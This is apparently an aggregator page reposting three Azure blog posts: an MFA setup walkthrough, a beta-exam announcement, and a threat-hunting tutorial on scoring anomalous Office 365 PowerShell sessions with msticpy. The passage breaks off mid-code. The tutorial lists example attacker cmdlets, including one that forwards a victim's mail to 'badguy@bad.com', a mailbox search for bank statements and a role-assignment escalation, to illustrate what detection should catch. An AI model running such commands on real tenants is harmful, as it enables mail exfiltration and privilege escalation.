by Scott Muniz | Jun 29, 2020 | Azure, Microsoft, Technology, Uncategorized

This article is contributed. See the original author and article here.

Introduction

In this article, we’re going to talk about enabling MFA for applications that are accessed over the internet. This forces users who access the application from the internet to authenticate with their primary credentials and with a second factor through Azure MFA.

Enabling App Service Authentication for a Web App







In this step-by-step guide, I’m going to show you how to enable MFA for an Azure App Service web app so that authentication is handled by Azure Active Directory and users accessing the app are required to perform multifactor authentication through a conditional access policy that Azure AD enforces. For this walkthrough, we assume there is already a web app deployed to Azure App Service.





Open the management blade for this app service and scroll down to Authentication/Authorization. This allows us to add authentication for users accessing the app.





Turn on App Service Authentication, set the action to log in with Azure Active Directory, and then click the Azure Active Directory option to configure it.

Select the Express settings; this creates an app registration in Azure Active Directory. The registration creates a service principal that represents the application and makes it possible to grant the application access to other Azure resources. We will use this app registration later when we create a conditional access policy to enforce Azure MFA. Click OK to enable this and save the changes.







Test the app: open a new browser window and browse to the application address. Because App Service Authentication is enabled, you should be redirected to the Azure AD login page to sign in with your Azure AD credentials.

Configuring MFA for an App Service Web App

We’ve got a working App Service web app with authentication set to redirect the user to log in with their Azure Active Directory credentials. Now let’s create a conditional access policy that forces the user to use Azure MFA for this particular app.



From the Active Directory blade, scroll down to the Conditional Access menu.



Give the policy a name, then select Users and groups. I want this policy to apply to anyone accessing the application, but you could scope it to a particular Azure AD group, user, or directory role.





Select the app that this policy will apply to. We want the app registration that was created for our App Service web app when we enabled authentication and authorization, which is called appformfa. Click Done.





Go to Access controls, which is set to Grant access. Select Require multifactor authentication. Don’t forget to enable the policy, then click Create. The policy is now enabled for the App Service.
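The same policy can also be described as data rather than portal clicks. The sketch below builds a request body in the shape used by the Microsoft Graph `conditionalAccessPolicy` resource; it only constructs and prints the JSON and does not call any API. The helper name `build_mfa_policy`, the policy display name, and the all-zero application ID are placeholders introduced for illustration, not values from this walkthrough.

```python
import json


def build_mfa_policy(display_name, app_id, include_users=("All",)):
    """Return a dict shaped like a Microsoft Graph conditionalAccessPolicy body.

    Hypothetical helper: it only builds the payload, nothing is sent anywhere.
    """
    return {
        "displayName": display_name,
        "state": "enabled",  # the portal's "Enable policy" switch
        "conditions": {
            "clientAppTypes": ["all"],
            # the app registration created by App Service Authentication
            "applications": {"includeApplications": [app_id]},
            # "All" applies the policy to every user; a group could be used instead
            "users": {"includeUsers": list(include_users)},
        },
        # grant access, but only after multifactor authentication
        "grantControls": {"operator": "OR", "builtInControls": ["mfa"]},
    }


# Placeholder application (client) ID; replace with the real app registration ID.
policy = build_mfa_policy(
    "Require MFA for appformfa",
    "00000000-0000-0000-0000-000000000000",
)
print(json.dumps(policy, indent=2))
```

Keeping the policy as a small function makes it easy to review which users and which application are in scope before anything is created.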





Open a new browser window, navigate to the App Service web app URL, and log in with the same user as before.



If this user wasn’t set up, they’d be prompted to set up MFA. The conditional access policy for the app is now requiring that the user log in with Azure MFA.

Enter the one-time passcode into the browser, and you will be brought into the app.

That’s it: we have successfully enabled MFA for an Azure web app.

Thank you

Magdy Salem

Credit: The blog was inspired by Pluralsight course Azure MFA Implementation

by Scott Muniz | Jun 29, 2020 | Azure, Microsoft, Technology, Uncategorized


As Microsoft Azure technology evolves, so does the Azure Solutions Architect Expert certification. In keeping with that evolution, we’re excited to announce new versions of the exams required for this certification: AZ-303: Microsoft Azure Architect Technologies (beta) and AZ-304: Microsoft Azure Architect Design (beta).

Is this the right certification for you?

As a candidate for the Azure Solutions Architect Expert certification, you should have subject matter expertise designing and implementing solutions that run on Azure. Your responsibilities include advising stakeholders and translating business requirements into secure, scalable, and reliable cloud solutions.

You’re on the right certification path if you have advanced experience and knowledge of IT operations, including networking, virtualization, identity, security, business continuity, disaster recovery, data platform, budgeting, and governance. You should also have expert-level skills in Azure administration and experience with Azure development and DevOps processes.

Ready to prove your skills on Azure architecture?

Be sure to take advantage of the discounted beta exam offers. The first 300 people who register for and take one of these exams on or before August 10, 2020, can get 80% off market price! This applies to both exam AZ-303 (beta) and exam AZ-304 (beta), for a total of 600 discounted exams. Remember that you can take Microsoft Certification exams online.

To receive the discount, register now. When you’re prompted for payment, use the associated code. This is not a private access code. The seats are offered on a first-come, first-served basis. Please note that neither of the beta exams is available in Turkey, Pakistan, India, or China.

| Schedule your exam | Use this promo code | Deadline to take the exam |
| --- | --- | --- |
| AZ-303: Microsoft Azure Architect Technologies (beta) | AZ303DonSuperStar | On or before August 10, 2020 |
| AZ-304: Microsoft Azure Architect Design (beta) | AZ304LMsmart | On or before August 10, 2020 |

Already on the journey to Azure Solutions Architect Expert certification? Mix and match your exams

If you’re ready to take AZ-300 or AZ-301 now, go for it. These two exams remain in market until September 30, 2020, at the regular price. To compare them with the new versions (AZ-303 and AZ-304), check out the skills outline document on each exam page.

If you just started the preparation journey, consider refocusing your studying efforts on the new exams—AZ-303 and AZ-304.

If you already passed either AZ-300 or AZ-301, you could take the new version of the complementary exam. The following exam combinations are valid for earning Azure Solutions Architect Expert certification: AZ-300 and AZ-301; AZ-300 and AZ-304; AZ-301 and AZ-303; or AZ-303 and AZ-304. (To see which exams you passed, check your transcript.)

Regardless of which of these exam combinations you take, when you pass, you’ll have earned your Azure Solutions Architect Expert certification and it will be valid for two years.

If you already hold the Azure Solutions Architect Expert certification, please note that we’re extending—by six months—all certifications that expire through December 31, 2020. If you want to prove that your skills are up to date right now, you can use the discounted beta exam as an opportunity to extend your certification’s expiration by two years.

Beta exam conditions

Want help preparing? Check out my blog post on preparing for beta exams. Remember that beta exams are scored once the exam is live, so you won’t know if you’ve passed for a few weeks. For updates on when the rescore is complete, follow me on Twitter (@libertymunson). For questions about the timing of beta exam scoring and live exam release, check out The path from beta to live.

Related announcements

Understanding Azure certifications

An important update on Microsoft training and certification

by Scott Muniz | Jun 29, 2020 | Azure, Microsoft, Technology, Uncategorized


Karishma Dixit – Microsoft Threat Intelligence Centre

Many audit logs contain multiple entries that can be thought of as a sequence of related activities, or session. In this blog, we use a Jupyter notebook to hunt for anomalous sessions in data ingested into Azure Sentinel. We use OfficeActivity logs to illustrate this in detail, though a similar approach can be applied to many other log types. A session is a timebound sequence of activities linked to the same user or entity. We consider an anomalous session one that has sequences (of events or activities) that we don’t see in other user sessions.

We demonstrate how to sessionize, model and visualise the data using msticpy and take a deep dive into the underlying implementation of the modelling methodology. We focus our analysis on sessions produced by users interacting with the Office 365 PowerShell API. This will provide insight into possible malicious activity in Office 365 Exchange and SharePoint.

Office 365 PowerShell API is a management API which can be used to manage Office365 services remotely via PowerShell Cmdlets. As well as providing users and administrators with convenient access to management functions of Office365, this API is also an attractive target for attackers as it provides many features that can be abused for persistence and data exfiltration. Some examples of potentially malicious commands are:

-

- Kohn” –DeliverToMailboxAndForward $true – ForwardingSMTPAddress “badguy@bad.com”

- This example delivers Douglas Kohn’s email messages to Douglas’s mailbox and forwards them to badguy@bad.com’s mailbox

- Collection

- New-MailboxSearch –Name “my search” –SourceMailboxes “Finance” –SearchQuery ‘Subject: “Your bank statement”’

- This example searches through the mailboxes of the “Finance” distribution group for emails which have the subject “Your bank statement”

- Permission changes

- New-ManagementRoleAssignment

- This cmdlet could be used by an attacker for privilege escalation

Since the Exchange Online cmdlets give us some good attack examples, we choose to focus our analysis on this subset of the API cmdlets. However, this is only a subset of what is available in the Office logs.

Using Jupyter Notebooks

Jupyter notebooks are a nice way of running custom Python code on data from your Azure Sentinel workspace. If you are new to Jupyter notebooks and would like to understand how they can help with threat hunting in Azure Sentinel, Ian Hellen wrote a series of blogs covering the topic.

We recently checked in a new notebook to the Azure Sentinel Notebooks GitHub repository. This notebook enables the user to sessionize, model and visualise their Exchange data from their Azure Sentinel OfficeActivity logs. It also serves as an example that you can extend to investigate other security log types. It achieves this by making use of the new anomalous_sequence subpackage from msticpy. For details on how this library works, please read the docs and/or refer to this more documentation-heavy notebook.

Below we go into more detail on how this notebook makes use of the anomalous_sequence subpackage to analyse Office management activity sessions.

Creating Sessions from your data

First, we need to sessionize the data. We define a session to be an ordered sequence of events that are usually linked by a common attribute (e.g. user account). In this blog, we treat the Office Exchange PowerShell cmdlets as the events.



The anomalous_sequence subpackage can handle three different formats for each of the sessions:

- Sequence of just events

["Set-User", "Set-Mailbox"]

- Sequence of events with the accompanying parameters used

[

Cmd(name="Set-User", params={"Identity", "Force"}),

Cmd(name="Set-Mailbox", params={"Identity", "AuditEnabled"})

]

- Sequence of events with the accompanying parameters and their corresponding values.

[

Cmd(name="Set-User", params={"Identity": "test@example.com", "Force": "true"}),

Cmd(name="Set-Mailbox", params={"Identity": "test@example.com", "AuditEnabled": "false"})

]

This allows you to build your analysis using only the event/cmdlet name, the event plus the parameter names, or the event plus the parameter names and their accompanying values.

To create sessions from timestamped events, we define the notion of user-related variables. A user-related variable is a data value that maps an event to a particular entity (e.g. UserId, ClientIP, ComputerId). This allows us to group events belonging to a single entity into sessions. We sort the events by both the user-related variables and the timestamp in ascending order. Then, each time one of the user-related variables changes in value, a new session is created. For the Office Exchange use case, we set the user-related variables to be “UserId” and “ClientIP”.

We also impose the following time constraints: each session can be no longer than 20 minutes in total, and each event in a session can be no more than 2 minutes apart. The time constraints used here are somewhat arbitrary and can be adjusted for different datasets/use cases.

We do the sessionizing directly inside of our KQL query to retrieve data from Azure Sentinel. In order to achieve this, we make use of the row_window_session function.

However, if your data is stored somewhere else and you wish to do the sessionizing using Python, then you can use the sessionize_data function from msticpy.
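To make the sessionizing rules concrete, here is a minimal standard-library sketch of the same logic. It is not the msticpy sessionize_data implementation, and it is not guaranteed to match the KQL function in every edge case; the function name `sessionize` and the dictionary layout of the events are assumptions made for this example.

```python
from datetime import datetime, timedelta


def sessionize(events, user_keys=("UserId", "ClientIP"),
               max_session=timedelta(minutes=20),
               max_gap=timedelta(minutes=2)):
    """Group event dicts (with 'TimeGenerated' and 'Operation') into sessions."""
    # sort by the user-related variables first, then by timestamp
    ordered = sorted(
        events,
        key=lambda e: tuple(e[k] for k in user_keys) + (e["TimeGenerated"],),
    )
    sessions = []
    for event in ordered:
        entity = tuple(event[k] for k in user_keys)
        current = sessions[-1] if sessions else None
        start_new = (
            current is None
            or current["entity"] != entity                        # user or IP changed
            or event["TimeGenerated"] - current["end"] > max_gap  # events too far apart
            or event["TimeGenerated"] - current["begin"] > max_session  # session too long
        )
        if start_new:
            current = {"entity": entity, "begin": event["TimeGenerated"],
                       "end": event["TimeGenerated"], "cmds": []}
            sessions.append(current)
        current["cmds"].append(event["Operation"])
        current["end"] = event["TimeGenerated"]
    return sessions


t0 = datetime(2020, 6, 1, 9, 0)
events = [
    {"UserId": "alice", "ClientIP": "10.0.0.1", "TimeGenerated": t0, "Operation": "Set-User"},
    {"UserId": "alice", "ClientIP": "10.0.0.1", "TimeGenerated": t0 + timedelta(minutes=1), "Operation": "Set-Mailbox"},
    {"UserId": "alice", "ClientIP": "10.0.0.1", "TimeGenerated": t0 + timedelta(minutes=10), "Operation": "Set-Mailbox"},
    {"UserId": "bob", "ClientIP": "10.0.0.2", "TimeGenerated": t0, "Operation": "Set-User"},
]
sessions = sessionize(events)
for s in sessions:
    print(s["entity"], s["begin"], s["cmds"])
```

In this toy input the third event for the first user arrives nine minutes after the second, so it opens a new session even though the user and IP address are unchanged.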

Here is the KQL query we use to both retrieve and sessionize the Office Exchange data:

let time_back = 60d;

OfficeActivity

| where TimeGenerated >= ago(time_back)

// filter to the event type of interest

| where RecordType == 'ExchangeAdmin'

// exclude some known automated users (optional)

| where UserId !startswith "NT AUTHORITY"

| where UserId !contains "prod.outlook.com"

// create new dynamic variable with the command as the key, and the parameters as the values (optional – only if you want to include params in the model)

| extend params = todynamic(strcat('{"', Operation, '" : ', tostring(Parameters), '}'))

| project TimeGenerated, UserId, ClientIP, Operation, params

// sort by the user related columns and the timestamp column in ascending order

| sort by UserId asc, ClientIP asc, TimeGenerated asc

// calculate the start time of each session into the "begin" variable

// With each session max 20 mins in length with each event at most 2 mins apart.

// A new session is created each time one of the user related columns change.

| extend begin = row_window_session(TimeGenerated, 20m, 2m, UserId != prev(UserId) or ClientIP != prev(ClientIP))

// summarize the operations and the params by the user related variables and the "begin" variable

| summarize cmds=makelist(Operation), end=max(TimeGenerated), nCmds=count(), nDistinctCmds=dcount(Operation),

params=makelist(params) by UserId, ClientIP, begin

//optionally specify an order to the final columns

| project UserId, ClientIP, nCmds, nDistinctCmds, begin, end, duration=end-begin, cmds, params

// filter out sessions which contain only one event (optional, commented out in this case)

//| where nCmds > 1







Once you have run this KQL query, you will end up with 1 row per session. Something like this:

Example output of the KQL query


Let’s see what needs to be done to this dataframe before we can start the modelling. The “cmds” column is already in an allowed format (list of strings). However, if we would like to include the accompanying parameters for each of the cmdlets (and the values set for those parameters) in the modelling stage, then we need to make sure the “params” column is a list of the Cmd datatype. We can see that the “params” column is a list of dictionaries, which is not quite what we want. Therefore, we must apply a small pre-processing step to convert it. The details for this pre-processing step can be found in the anomalous_sequence subpackage documentation.
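As a rough illustration of that conversion, the sketch below turns one row of the “params” column into a list of Cmd-like objects. It assumes each dictionary maps a cmdlet name to a list of {"Name": ..., "Value": ...} entries, which is the shape the query above would produce if the Parameters column holds such a list. The `Cmd` namedtuple is a stand-in defined here so the example runs without msticpy, and `to_cmd_session` is a hypothetical helper name.

```python
from collections import namedtuple

# Stand-in for the msticpy Cmd datatype (assumption: same two fields).
Cmd = namedtuple("Cmd", ["name", "params"])


def to_cmd_session(param_dicts, include_values=True):
    """Convert [{cmdlet: [{'Name': ..., 'Value': ...}, ...]}, ...] into a list of Cmd."""
    session = []
    for entry in param_dicts:
        for cmd_name, raw_params in entry.items():
            pairs = {p["Name"]: p.get("Value") for p in (raw_params or [])}
            # keep name -> value pairs, or only the set of parameter names
            params = pairs if include_values else set(pairs)
            session.append(Cmd(name=cmd_name, params=params))
    return session


row = [
    {"Set-User": [{"Name": "Identity", "Value": "test@example.com"},
                  {"Name": "Force", "Value": "true"}]},
    {"Set-Mailbox": [{"Name": "Identity", "Value": "test@example.com"},
                     {"Name": "AuditEnabled", "Value": "false"}]},
]
param_value_session = to_cmd_session(row)
param_session = to_cmd_session(row, include_values=False)
print(param_value_session)
print(param_session)
```

With a pandas dataframe, a function like this could be applied row by row to build the session column used for modelling.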



Example of the pre-processed dataframe


Modelling and scoring the sessions

Now that we have created the sessions from our Office Exchange logs, it is time to train a model on them.

Since we have chosen an unsupervised approach, we do not require our sessions to have labelled outcomes (1 for malicious, 0 for benign). We train a model by estimating a series of probabilities for the cmdlets and optionally for the accompanying parameters and values if provided. We then use these estimated probabilities to compute a “likelihood score” for each session. This allows us to rank all our sessions in order from least likely to most likely. We can then hunt for anomalous activity by focusing on the sessions with lower likelihoods scores.

To calculate the likelihood scores for the sessions, we use a sliding window approach. We do this by fixing a window length, of size 3 for example. The likelihood score for a session is then calculated by computing the likelihood of each window of length 3, and then taking the lowest likelihood as the score.

More details about the modelling are provided later in the deep dive section.

We wrote a high-level function in msticpy which takes a pandas dataframe as input, trains the model and then assigns a likelihood score to each session. The output is a copy of the input dataframe with additional columns appended for the likelihood score and the rarest window in the session. The lower likelihood scores correspond with the more rare/anomalous sessions.

Assuming your dataframe from the sessionizing section is called “data” and has the sessions contained in column “param_value_session”, you can run this snippet:

from msticpy.analysis.anomalous_sequence import anomalous

modelled_df = anomalous.score_sessions(

data=data,

session_column='param_value_session',

window_length=3

)

This function will infer what type of sessions you have provided and will do the modelling accordingly. If your sessions are just a list of the cmdlets, then it will model just the cmdlets. If instead they are a list of the Cmd datatype, then it will include the parameters (and values if provided) in the modelling.

You can then sort the resulting dataframe in ascending order of the likelihood score (scores close to zero are least likely/more anomalous) to see which sessions have been deemed the most anomalous by the model:

modelled_df.sort_values('rarest_window3_likelihood').head()

Alternatively, if you wanted to return all sessions within a certain threshold (on the likelihood score), you could run the following:

modelled_df.loc[modelled_df.rarest_window3_likelihood < 0.001]

For more control over the model configuration, you can use the Model class directly. This allows you to choose whether start and end tokens are used and whether the geometric mean is used, and it provides access to some additional useful methods.

Notice that so far, we have trained a model on some data and then used the trained model to assign a likelihood score to each of the sessions from the same dataset. However, another use-case could be to train the model on a big batch of historical data and then use the trained model to compute likelihood scores for new sessions (not present in the training data) as they arise. We do not currently have a high-level implementation for this use case. However it is still possible via usage of the rarest_window_session functions from the anomalous_sequence utility functions. We hope to include a high-level implementation for this use case in a future release of msticpy.

Visualising your modelled sessions

We now demonstrate how you can visualise your sessions once they have been scored by the model.

We do this using the visualise_scored_sessions function from msticpy.

- The time of the session will be on the x-axis

- The computed likelihood score will be on the y-axis

- Lower likelihoods correspond with rarer sessions

# visualise the scored sessions in an interactive timeline plot.

anomalous.visualise_scored_sessions(

data_with_scores=modelled_df,

time_column='begin', # this will appear on the x-axis

score_column='rarest_window3_likelihood', # this will appear on the y axis

window_column='rarest_window3', # this will represent the session in the tool-tips

source_columns=['UserId', 'ClientIP'] # specify any additional columns to appear in the tool-tips

)

This function returns an interactive timeline plot which allows you to zoom into different sections and hover over individual sessions. Because the likelihood score is on the y-axis, the more rare/anomalous sessions will be towards the bottom of the chart. The timeline view can be useful for spotting patterns over time. For example, it could help to rule out some series of benign scheduled sessions when you are trying to hunt for malicious sessions and see if there are any temporal patterns associated with the anomalous activity.

Please note that the example plot provided here is based on synthetic data and is therefore not representative of what your own data will look like.

In this section, we give some details about how the modelling works under the hood for each of the three session formats.

We use the terms “probability” and “likelihood” interchangeably throughout this section and denote them both by “p” in the math.

Modelling simple sessions:



Let us define an example session to be session = [A, B, C]

Then by applying the chain rule and Markov assumption, we can model the likelihood of the session as follows:

The Markov property is when the conditional probability of the next state depends only on the current state and on none of the states prior to the current state.
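Written out for the example session, and leaving the start and end tokens aside for the moment, the chain rule followed by the Markov assumption gives the expression below. This is a reconstruction from the surrounding text rather than a copy of the original figure.

```latex
\begin{aligned}
p(A, B, C) &= p(A)\, p(B \mid A)\, p(C \mid A, B) && \text{(chain rule)} \\
           &\approx p(A)\, p(B \mid A)\, p(C \mid B) && \text{(Markov assumption)}
\end{aligned}
```

The only term that changes is the last one: under the Markov assumption, C is conditioned on B alone rather than on both A and B.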



We define a transition probability as the probability of going from the previous event state to the current event state and we denote it as follows:

A subtlety to note is that, by default, we prepend a start token and append an end token to each session. So the first event A is conditioned on the start token, and the likelihood calculation includes an additional transition probability for the session terminating given the last event C.





So, to calculate the likelihood of a session, we would simply need to multiply a sequence of transition probabilities together. These transition probabilities can be estimated from the sessionized data as follows:
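One simple way to estimate transition probabilities is to count how often each pair of consecutive events occurs and divide by how often the first event of the pair occurs. The sketch below does exactly that with plain counts and no smoothing; it is an illustrative assumption, not the msticpy code, and the "##START##" token name is chosen here by analogy with the end token.

```python
from collections import Counter

START, END = "##START##", "##END##"  # START name is an assumption for this sketch


def estimate_transition_probs(sessions):
    """Estimate p(current | previous) as count(previous -> current) / count(previous)."""
    pair_counts = Counter()
    prev_counts = Counter()
    for session in sessions:
        tokens = [START] + list(session) + [END]
        for prev, cur in zip(tokens, tokens[1:]):
            pair_counts[(prev, cur)] += 1
            prev_counts[prev] += 1
    return {pair: n / prev_counts[pair[0]] for pair, n in pair_counts.items()}


def session_likelihood(session, probs):
    """Multiply the transition probabilities along the session, tokens included."""
    tokens = [START] + list(session) + [END]
    likelihood = 1.0
    for prev, cur in zip(tokens, tokens[1:]):
        likelihood *= probs.get((prev, cur), 0.0)  # unseen transition -> 0 without smoothing
    return likelihood


sessions = [["A", "B", "C"], ["A", "B", "C"], ["A", "C"], ["B", "C"]]
probs = estimate_transition_probs(sessions)
print(probs[("A", "B")])
print(session_likelihood(["A", "B", "C"], probs))
```

Without smoothing, any session containing a transition that never appeared in the training data gets a likelihood of exactly zero.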

The likelihood calculations for longer sessions (more events) involve multiplying more transition probabilities together. Because the transition probabilities are between 0 and 1, this likelihood calculation will converge to zero as the session length gets longer. This could result in sessions being flagged as rare/anomalous simply because they are longer in length. Therefore, to circumvent this, we use a sliding window to compute a likelihood score per session.

Let us consider the following session = [A, B, C, D]

Let us also fix the sliding window length to be 3. Then we would compute the likelihoods of the following windows:

- [A, B, C]

- [B, C, D]

- [C, D, ##END##]

And then take the likelihood of the lowest scoring window as the score for the full session.

Notice that we are still using a start token in addition to the end token shown. The end token means we include an additional probability for the session terminating after the final event D. Whereas the start token appears implicitly when we condition the first event A on the start token.

It is important to note that if you choose a window length of k, then only sessions which have at least k-1 events will have a likelihood score computed. The -1 is because sessions of length k-1 get treated as length k during the scoring. This is due to the end token being appended before the likelihood score is computed.

This sliding window approach means we can more fairly compare the scores between sessions of different lengths. Additionally, if a long session contains mostly benign activity except for a small window in the middle with unusual malicious activity, then this sliding window method should hopefully be able to capture it in the score.
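The sliding window scoring can be sketched as follows. The transition and prior probabilities are made-up numbers for illustration. One detail is an assumption of this sketch: the first event of the first window is conditioned on the start token, while the first event of every later window uses a standalone prior probability for that event. The function name `score_session` is hypothetical.

```python
START, END = "##START##", "##END##"  # START name is an assumption for this sketch


def score_session(session, trans_probs, prior_probs, window_len=3):
    """Return (lowest window likelihood, that window), or None if the session is too short."""
    tokens = list(session) + [END]  # the end token is appended before scoring
    if len(tokens) < window_len:
        return None
    best = None
    for i in range(len(tokens) - window_len + 1):
        window = tokens[i:i + window_len]
        # first window: condition on the start token; later windows: use a prior
        lik = trans_probs[(START, window[0])] if i == 0 else prior_probs[window[0]]
        for prev, cur in zip(window, window[1:]):
            lik *= trans_probs[(prev, cur)]
        if best is None or lik < best[0]:
            best = (lik, window)
    return best


# Illustrative probabilities only, not estimated from real data.
trans_probs = {
    (START, "A"): 0.5, ("A", "B"): 0.8, ("B", "C"): 0.5,
    ("C", "D"): 0.1, ("D", END): 1.0,
}
prior_probs = {"A": 0.25, "B": 0.25, "C": 0.25, "D": 0.25}

result = score_session(["A", "B", "C", "D"], trans_probs, prior_probs)
print(result)
print(score_session(["A"], trans_probs, prior_probs))
```

For the session [A, B, C, D] the three windows are [A, B, C], [B, C, D] and [C, D, ##END##], and the rare C to D transition makes the middle window the lowest scoring one.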

Okay, so this seems good. But what if most of our sessions are just the same few sequences of events repeated? How can we differentiate between these sessions?

Modelling sessions with parameters

Some of the PowerShell cmdlets appear extremely often in our data in a seemingly scheduled, automated way. The “Set-Mailbox” cmdlet is an example of this. This means we can end up with many identical sessions containing the exact same sequence of cmdlets. The “Set-Mailbox” cmdlet can accept many different parameters. If we include the parameters in the modelling of the sessions, then it can help us to differentiate between the automated benign usage of a cmdlet and a more unusual usage.







Let us define an event as:

Where ci is the cmdlet used in the ith event of the session and each pj is either 1 if that parameter has been set for ci or 0 if not.

For example, suppose ci is the “Set-Mailbox” cmdlet and suppose that across all our sessions data, the only distinct parameters we have seen used for this cmdlet are [“Identity”, “DisplayName”, “ForwardingSmtpAddress”]. Suppose then that “Identity” and “ForwardingSmtpAddress” were set for this event, but the “DisplayName” parameter was not specified, then the parameter vector for this event would be [1, 0, 1].

Let us denote the parameter vector by {pk}i as a shorthand.

We now model the probability of the current event conditional on the previous event as follows:

We made the following modelling assumptions:

- The parameters {pk}i used for the current event depend only on the current cmdlet ci and not on the previous event xi-1

- The current cmdlet ci depends only on the previous cmdlet ci-1 and not on the previous parameters {pm}i-1

- The presence of each parameter pji is modelled as an independent Bernoulli random variable, conditional on the current cmdlet ci
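Under these three assumptions, the conditional probability of an event factorises as sketched below, writing $c_i$ for ci and $p_{ji}$ for pji. This is a reconstruction from the stated assumptions; the symbol $\theta_{j \mid c_i}$, the probability that parameter $j$ is set given cmdlet $c_i$, is shorthand introduced here.

```latex
\begin{aligned}
p(x_i \mid x_{i-1})
  &= p\big(c_i, \{p_k\}_i \mid c_{i-1}, \{p_m\}_{i-1}\big) \\
  &= p(c_i \mid c_{i-1})\; p\big(\{p_k\}_i \mid c_i\big) \\
  &= p(c_i \mid c_{i-1}) \prod_{j=1}^{k}
     \theta_{j \mid c_i}^{\,p_{ji}} \,\big(1 - \theta_{j \mid c_i}\big)^{1 - p_{ji}}
\end{aligned}
```

The second line uses the first two assumptions, and the product in the third line follows from treating each parameter as an independent Bernoulli variable.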







We can estimate the probability of a parameter being used for a given cmdlet from our sessionized data as follows:

So now we can calculate the probabilities of the parameters conditional on the cmdlets and also the transition probabilities as before. The likelihood calculation for a session now involves multiplying a sequence of probabilities p(xi|xi-1) together where each p(xi|xi-1) can be decomposed as shown above. We also use the sliding window approach as before so we can more fairly compare the likelihoods between sessions of different lengths.





A subtlety to note is that in our implementation of this in msticpy, we take the geometric mean of this product:

This means we raise the product of probabilities to the power of 1/k. The reason for this is because the cmdlets can have a vastly different number of parameters set on average. By taking the geometric mean, we can have a fairer comparison of how rare sets of parameters are across the different cmdlets.
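The effect of the geometric mean can be seen in a small sketch. The per-parameter probabilities are invented for illustration, and the function name `params_likelihood` is hypothetical. Here k is taken to be the number of distinct parameters seen for the cmdlet, which is an assumption of this example.

```python
def params_likelihood(params_set, param_probs, use_geo_mean=True):
    """Likelihood of a set of parameters given a cmdlet.

    param_probs maps every parameter seen for the cmdlet to the probability
    that it is set. Parameters that are absent contribute (1 - probability).
    """
    likelihood = 1.0
    for param, prob in param_probs.items():
        likelihood *= prob if param in params_set else 1.0 - prob
    if use_geo_mean and param_probs:
        # raise the product to the power 1/k, with k parameters for this cmdlet
        likelihood **= 1.0 / len(param_probs)
    return likelihood


# Illustrative probabilities for "Set-Mailbox", not estimated from real data.
set_mailbox_probs = {"Identity": 0.9, "DisplayName": 0.5, "ForwardingSmtpAddress": 0.1}
observed = {"Identity", "ForwardingSmtpAddress"}  # parameter vector [1, 0, 1]

raw = params_likelihood(observed, set_mailbox_probs, use_geo_mean=False)
geo = params_likelihood(observed, set_mailbox_probs)
print(raw, geo)
```

A cmdlet with many possible parameters multiplies many factors below 1, so the raw product shrinks quickly; taking the k-th root puts cmdlets with few and many parameters on a more comparable scale.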

Now we move on to describe how we implement the model for the case where the values of the parameters are modelled alongside the parameter names.

Modelling sessions with parameters and values

Some of the PowerShell cmdlets can accept parameters which have higher security stakes. For example, the Add-MailboxPermission cmdlet has an “AccessRights” parameter which can accept values such as “ReadPermission” and “FullAccess”. Because the “FullAccess” value could be used by an attacker for privilege escalation, it could be worth including the values of the parameters in the modelling of the sessions.

However not all the values are going to be useful in the modelling since parameters such as “Identity” can take arbitrary strings as their values. We therefore use some rough heuristics to determine which parameters take values which are categorical (e.g. high, medium, low) as opposed to arbitrary strings. We only include the values in the modelling for parameters which have been deemed suitable by the heuristics. However, there is the option to override the heuristics in the Model class directly.





This time, we denote an event as follows:

Where ci is the cmdlet used in the ith event of the session, each pk is either 1 if that parameter has been set for ci or 0 if not, and each vk is the value set for the parameter pk (if the parameter was set).

We now model the probability of the current event conditional on the previous event as follows:

In addition to the modelling assumptions from the previous section, we assume the following:

- The values {vk}i depend only on the parameters {pk}i and not on the cmdlet ci



- The values vji are modelled as independent categorical random variables conditional on the parameter pj

- The probability of the value vji conditioned on parameter pj is only included if the parameter was set for cmdlet ci
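Putting these assumptions together with those from the previous section, the conditional probability of an event can be sketched as below, before any geometric mean is applied. This is a reconstruction from the listed assumptions rather than the original figure; $\theta_{j \mid c_i}$ is shorthand introduced here for the probability that parameter $j$ is set given cmdlet $c_i$, and the value factor is understood to be included only for parameters whose values are treated as categorical.

```latex
p(x_i \mid x_{i-1})
  = p(c_i \mid c_{i-1})
    \prod_{j=1}^{k}
    \Big[\theta_{j \mid c_i}\; p(v_{ji} \mid p_j)\Big]^{p_{ji}}
    \Big[1 - \theta_{j \mid c_i}\Big]^{1 - p_{ji}}
```

When a parameter is not set, $p_{ji} = 0$ and the value term drops out, which matches the last assumption in the list.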

We can estimate the probability of a value conditional on the parameter as follows:

A subtlety to note is that in our implementation of this in msticpy, we take the geometric mean of this product:

However, whilst in the previous section we raised the product of probabilities to the power of 1/k, this time we raise it to the power of:

The reason for the modified exponent is so we can more fairly compare how rare a set of parameters + values are between the cases where some values are categorical vs arbitrary strings.

Some further notes

There are a few more details about our implementation which are worth mentioning. We apply Laplace smoothing and introduce an ‘##UNK##’ token for unseen cmdlets, parameters and values during the model training.

Laplace smoothing is where we add 1 to each of the counts that we observed in the data. For example, if the transition sequence of cmdlets “Set-Mailbox” –> “Set-User” appeared in our sessionized data 1000 times, we would use 1001 as the count instead. The reason for this is so that when we estimate the probabilities from the counts, we shift some of the probability mass from the very probable cmdlets/parameters/values to the unseen and very unlikely cmdlets/parameters/values.

By including the ‘##UNK##’ token, we can handle cmdlets/parameters/values that we have not previously seen and are therefore not included in the trained model. Suppose that after the model training, we have some new sessions with cmdlets, parameters or values that were not included in the data from which we trained our model. We would like to use the trained model to compute the likelihood scores for these new sessions as well. Suppose a new session contains an unseen transition sequence such as “Set-User” –> “Some-UnseenCmdlet”. Then during the likelihood score calculation, when trying to access the probability for the unseen transition, the probability for this transition will be used instead: “Set-User” –> “##UNK##”. Now although we would not have encountered “Set-User” –> “##UNK##” during the model training, because of the Laplace smoothing, this transition would have a count of 1 instead of 0, and would therefore have a small non-zero probability.

This means we can train a model on some historical data, and then use the trained model to score new sessions without the model raising exceptions for previously unseen cmdlets/parameters/values.
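A minimal sketch of Laplace smoothing combined with an unknown token is shown below for the cmdlet transitions only. It is written under assumptions: the vocabulary handling, the "##START##" token name and the function names are choices made for this example and may differ from the msticpy implementation.

```python
from collections import Counter

START, END, UNK = "##START##", "##END##", "##UNK##"  # START name is an assumption


def train_smoothed(sessions):
    """Estimate transition probabilities with add-one (Laplace) smoothing."""
    counts = Counter()
    vocab = {START, END, UNK}
    for session in sessions:
        tokens = [START] + list(session) + [END]
        vocab.update(tokens)
        counts.update(zip(tokens, tokens[1:]))
    probs = {}
    targets = vocab - {START}        # nothing transitions into the start token
    for prev in vocab - {END}:       # nothing transitions out of the end token
        total = sum(counts[(prev, cur)] + 1 for cur in targets)
        for cur in targets:
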